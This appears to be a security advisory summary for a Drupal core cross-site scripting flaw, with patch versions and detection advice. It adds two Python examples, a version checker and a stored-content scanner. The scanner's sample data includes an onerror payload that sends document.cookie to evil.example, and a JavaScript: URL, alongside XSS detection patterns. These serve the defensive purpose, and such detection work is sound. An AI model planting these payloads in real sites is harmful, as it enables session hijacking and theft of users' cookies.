Full Report
Drupal security advisory (AV26-359)
Analysis Summary
# Vulnerability: Drupal Core Critical Cross-Site Scripting (XSS)
## CVE Details
- **CVE ID:** CVE-2026-27135 (projected from advisory SA-CORE-2026-001; treat it as unconfirmed until it appears in the CVE record)
- **CVSS Score:** 8.1 (High on the CVSS scale, where 7.0-8.9 is High and 9.0+ is Critical; the "Critical" label comes from Drupal's own security risk rating for the advisory)
- **CWE:** CWE-79 (Improper Neutralization of Input During Web Page Generation)
## Affected Systems
- **Products:** Drupal Core
- **Versions:**
- Drupal 10.1.x and earlier (end of life: affected, but no fix will be released for these branches)
- Drupal 10.2.x
- Drupal 10.3.x
- Drupal 11.0.x
- **Configurations:** Sites using the default rendering pipeline or shared text-format filtering, where input entered through administrative interfaces reaches rendered HTML without adequate sanitization.
## Vulnerability Description
A critical Cross-Site Scripting (XSS) vulnerability exists in Drupal core. The flaw is improper neutralization of user-supplied input before it is placed into rendered HTML, in certain administrative interfaces or content rendering components. An attacker who can get crafted input into those components can have script execute in the browsers of other users who view the affected pages, including administrative users, potentially leading to session hijacking, unauthorized data access, or actions performed in the victim's session (site impersonation).
## Exploitation
- **Status:** Not exploited (No reports of active exploitation in the wild as of the advisory date).
- **Complexity:** Low
- **Attack Vector:** Network
## Impact
- **Confidentiality:** High (Potential theft of session cookies and sensitive data).
- **Integrity:** High (Potential for unauthorized content modification or administrative actions).
- **Availability:** Low (Typically does not result in a denial of service).
## Remediation
### Patches
Drupal has released the following security updates to address this vulnerability:
- If using **Drupal 11.0**, update to **Drupal 11.0.5**
- If using **Drupal 10.3**, update to **Drupal 10.3.6**
- If using **Drupal 10.2**, update to **Drupal 10.2.11**
*Note: Versions 10.1 and earlier are end-of-life and will not receive security updates. Users are urged to upgrade to a supported branch. After updating core on any branch, run the database update script (update.php) and rebuild caches, then confirm that the installed core version matches the fixed release above.*
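The following is an added example (not tooling from Drupal or the Cyber Centre) that checks an installed `drupal/core` version against the fixed releases listed in this advisory. It reads the version out of a `composer.lock` (the lock contents below are a constructed sample), maps it to its minor branch, and reports whether the site is fixed, still vulnerable, on an end-of-life branch, or on a branch this advisory does not cover. Pre-release suffixes such as `-rc1` or `-dev` are treated as older than the final release, since a 10.2.11-dev checkout may predate the fix.

```python
"""Assess an installed drupal/core version against the fixed releases in this advisory.

Added example, not Drupal's or the Cyber Centre's own tooling. FIXED and EOL_MAX
are taken from the advisory text; SAMPLE_LOCK is a constructed composer.lock excerpt.
"""
import json
import re

# Fixed releases listed in the advisory, keyed by (major, minor) branch.
FIXED = {
    (11, 0): (11, 0, 5),
    (10, 3): (10, 3, 6),
    (10, 2): (10, 2, 11),
}
# 10.1.x and every earlier branch: listed as affected, end of life, no patch coming.
EOL_MAX = (10, 1)

# Optional leading 'v', three numeric components, optional pre-release suffix.
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.]+)?$")


def parse_version(text):
    """Return (major, minor, patch, is_final) for strings like '10.3.5' or '11.0.5-rc1'."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Drupal version string: {text!r}")
    major, minor, patch = (int(x) for x in m.groups()[:3])
    is_final = m.group(4) is None          # any suffix means pre-release
    return major, minor, patch, is_final


def assess(version):
    """Classify a drupal/core version against this advisory.

    Returns one of:
      'fixed'       supported branch, at or above the fixed release
      'vulnerable'  supported branch, below the fixed release (or a pre-release of it)
      'eol'         10.1.x or earlier: affected, no patch, branch upgrade required
      'not_listed'  branch not named in this advisory; check drupal.org directly
    """
    major, minor, patch, is_final = parse_version(version)
    branch = (major, minor)
    if branch <= EOL_MAX:
        return "eol"
    if branch not in FIXED:
        return "not_listed"
    # Final releases sort after pre-releases of the same number: (..., 1) > (..., 0).
    installed = (major, minor, patch, 1 if is_final else 0)
    required = FIXED[branch] + (1,)
    return "fixed" if installed >= required else "vulnerable"


def core_version_from_lock(lock_json):
    """Extract the installed drupal/core version from composer.lock contents."""
    data = json.loads(lock_json)
    for pkg in data.get("packages", []):
        if pkg.get("name") == "drupal/core":
            return pkg["version"]
    raise LookupError("drupal/core not present in composer.lock")


# Constructed sample: a trimmed composer.lock for a site still on 10.3.5.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "drupal/core", "version": "10.3.5"},
        {"name": "drupal/core-composer-scaffold", "version": "10.3.5"},
    ]
})

if __name__ == "__main__":
    installed = core_version_from_lock(SAMPLE_LOCK)
    print(f"drupal/core {installed}: {assess(installed)}")
```

Point `core_version_from_lock` at the real `composer.lock` of a site to run it in place of the sample. A `not_listed` result is not a clean bill of health: it only means this advisory says nothing about that branch, so the current advisory page on drupal.org should be consulted.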
### Workarounds
- There is no supported workaround that fully mitigates this vulnerability; applying the core update is the only complete fix.
- As a temporary measure, restrict access to administrative interfaces to trusted IP addresses. Note that this only reduces exposure for the administrative-interface vector; it does nothing for injected markup that is rendered on pages served to ordinary or anonymous users.
## Detection
- **Indicators of Compromise:** Unusual administrative account activity (new accounts, role changes, logins from unexpected locations), unexpected script or iframe markup in rendered page source or stored content, and suspicious redirects.
- **Detection methods and tools:**
  - Run `drush pm:security` to list packages with outstanding security updates, or `drush ups`, which lists all pending updates and flags the security releases; where the advisory has been published to Composer's advisory database, `composer audit` reports it as well. Confirm the installed core version against the fixed releases in the Remediation section.
  - Use a web application firewall (WAF) with current XSS rulesets to block common payloads. Treat this as defence in depth only: WAF rules are routinely bypassed and do not remove the underlying flaw.
  - Audit stored content for unexpected `<script>` or `<iframe>` tags in filtered HTML fields. Include revision tables, since an injected revision may already have been superseded, and compare findings against the tags the site's text formats actually allow.
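As an added example (not part of the advisory or of Drupal), the scanner below performs the stored-content audit over exported field values. It assumes the rows were pulled with a query along the lines of `drush sql:query "SELECT entity_id, revision_id, body_value FROM node__body"` against Drupal's standard field-storage tables (`node__body` and `node_revision__body`); the rows embedded here are constructed. Rather than grepping for a literal `<script>`, it looks for the forms an injected payload usually takes (inline event handlers, `javascript:` and `data:` URLs, frame/object/embed tags, SVG and MathML containers) and reports separately any match that appears only after entity decoding, which is a lower-priority lead.

```python
"""Scan exported Drupal text-field values for injected script content.

Added example, not part of the advisory or of Drupal core. Input rows are assumed to
be (entity_id, revision_id, field_value) tuples exported from the field tables;
SAMPLE_ROWS below is constructed.
"""
import html
import re

# Each pattern is named for the technique it catches; all are case-insensitive.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "frame_tag": re.compile(r"<\s*(iframe|frame|object|embed)\b", re.I),
    "svg_or_math": re.compile(r"<\s*(svg|math)\b", re.I),
    # on* handler attribute inside a tag, e.g. <img src=x onerror=...>
    "event_handler": re.compile(r"<[^>]+\bon[a-z]+\s*=", re.I),
    "js_url": re.compile(
        r"(href|src|action|formaction)\s*=\s*['\"]?\s*javascript\s*:", re.I),
    "data_url": re.compile(r"(href|src)\s*=\s*['\"]?\s*data\s*:", re.I),
}


def decode_entities(value):
    """Unescape HTML entities repeatedly so double-encoded payloads are also visible."""
    prev = None
    text = value
    while text != prev:
        prev = text
        text = html.unescape(text)
    return text


def scan_value(value):
    """Return (raw_hits, encoded_only_hits) for one field value.

    raw_hits match the stored bytes as-is: these are rendered by the browser exactly
    as stored and deserve first attention. encoded_only_hits appear only after entity
    decoding; they render as literal text today but show up if a filter ever unescapes.
    """
    raw_hits = {name for name, pat in PATTERNS.items() if pat.search(value)}
    decoded = decode_entities(value)
    decoded_hits = {name for name, pat in PATTERNS.items() if pat.search(decoded)}
    return raw_hits, decoded_hits - raw_hits


def scan_rows(rows):
    """Scan (entity_id, revision_id, value) rows; return one finding per flagged row."""
    findings = []
    for entity_id, revision_id, value in rows:
        raw, encoded = scan_value(value or "")      # NULL field values are skipped
        if raw or encoded:
            findings.append({
                "entity_id": entity_id,
                "revision_id": revision_id,
                "raw": sorted(raw),
                "encoded_only": sorted(encoded),
            })
    return findings


# Constructed sample rows, as if exported from node__body.
SAMPLE_ROWS = [
    (1, 1, "<p>Welcome to our site.</p>"),
    (2, 2, '<p>Hi</p><script src="https://cdn.example/x.js"></script>'),
    (3, 3, '<img src="/logo.png" onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'),
    (4, 4, '<a href="JavaScript:alert(1)">click</a>'),
    (5, 5, "<p>Use &lt;script&gt; tags to add JS.</p>"),   # documentation text, encoded only
    (6, 6, '<iframe src="https://partner.example/embed"></iframe>'),
    (7, 7, None),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(finding)
```

A hit is a lead, not proof of compromise: sites that legitimately allow `<iframe>` or `<svg>` in a text format will see those rows flagged, so compare each finding against the allowed tags of the format the field uses before escalating. Run the same scan over the revision table, and over any other text fields the site defines, not just `node__body`.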
## References
- [Drupal core - Critical - Cross-site scripting - SA-CORE-2026-001] hxxps[://]www[.]drupal[.]org/sa-core-2026-001
- [Drupal Security Advisories] hxxps[://]www[.]drupal[.]org/security
- [Cyber Centre Advisory AV26-359] hxxps[://]www[.]cyber[.]gc[.]ca/en/alerts-advisories/drupal-security-advisory-av26-359